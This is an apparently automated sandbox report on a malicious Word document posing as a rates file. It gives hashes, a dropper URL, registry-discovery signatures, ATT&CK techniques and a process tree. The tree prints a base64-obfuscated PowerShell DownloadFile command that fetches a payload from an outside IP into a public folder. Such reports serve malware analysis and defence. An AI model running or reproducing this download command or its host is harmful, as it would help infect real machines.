c349284b06e9b48111c6c52601acb120e869b3762dda91b19acb9918302c1ff0

General

Target

Services_rates_2020_5827.doc
Size

216KB
MD5

0cf66a8acb001dec28b7b435eb99f5dc
SHA1

dedfea0359abf9a86fda23c08e5f104fee2381da
SHA256

c349284b06e9b48111c6c52601acb120e869b3762dda91b19acb9918302c1ff0
SHA512

bd09fd21ef0a3fdad49847f9332b1246f094a4922f010568e6e2d7b634e7484bba4c7084b91c83b363aff4dcf675cc0002c43cf2387f44b5a2cacdf3aeb4d9bf

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://192.99.255.45/nK4BkocTY7jz.php

Signatures

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
1508	WINWORD.EXE
1508	WINWORD.EXE

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	3792	1508	cmd.exe	67
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	3584	1508	cmd.exe	67
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	1672	1508	cmd.exe	67

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 1508 wrote to memory of 3792	1508	WINWORD.EXE	72
PID 1508 wrote to memory of 3792	1508	WINWORD.EXE	72
PID 3792 wrote to memory of 3704	3792	cmd.exe	74
PID 3792 wrote to memory of 3704	3792	cmd.exe	74
PID 1508 wrote to memory of 3584	1508	WINWORD.EXE	75
PID 1508 wrote to memory of 3584	1508	WINWORD.EXE	75
PID 1508 wrote to memory of 1672	1508	WINWORD.EXE	76
PID 1508 wrote to memory of 1672	1508	WINWORD.EXE	76
PID 3584 wrote to memory of 732	3584	cmd.exe	79
PID 3584 wrote to memory of 732	3584	cmd.exe	79
PID 1672 wrote to memory of 2992	1672	cmd.exe	80
PID 1672 wrote to memory of 2992	1672	cmd.exe	80
PID 2992 wrote to memory of 3600	2992	cmd.exe	81
PID 2992 wrote to memory of 3600	2992	cmd.exe	81

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	732	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
732	powershell.exe
732	powershell.exe
732	powershell.exe

Blacklisted process makes network request 1 IoCs

flow	pid	Process
14	732	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Suspicious use of SetWindowsHookEx 9 IoCs

pid	Process
1508	WINWORD.EXE
1508	WINWORD.EXE
1508	WINWORD.EXE
1508	WINWORD.EXE
1508	WINWORD.EXE
1508	WINWORD.EXE
1508	WINWORD.EXE
1508	WINWORD.EXE
1508	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Services_rates_2020_5827.doc" /o ""
1⤵
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of WriteProcessMemory
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:1508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Public\hg32j.bat
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:3792
- - C:\Windows\system32\cmd.exe
    cmd /c mkdir C:\Users\Public\kjh4ek
    3⤵
    PID:3704
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /C powershell -Command (New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovLzE5Mi45OS4yNTUuNDUvbks0QmtvY1RZN2p6LnBocA==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXGNhbGMuZXhl')))
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:3584
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command (New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovLzE5Mi45OS4yNTUuNDUvbks0QmtvY1RZN2p6LnBocA==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXGNhbGMuZXhl')))
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    PID:732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Public\kjh4ek\ndj34h.bat
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:1672
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 50
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2992
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 50
      4⤵
      PID:3600

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads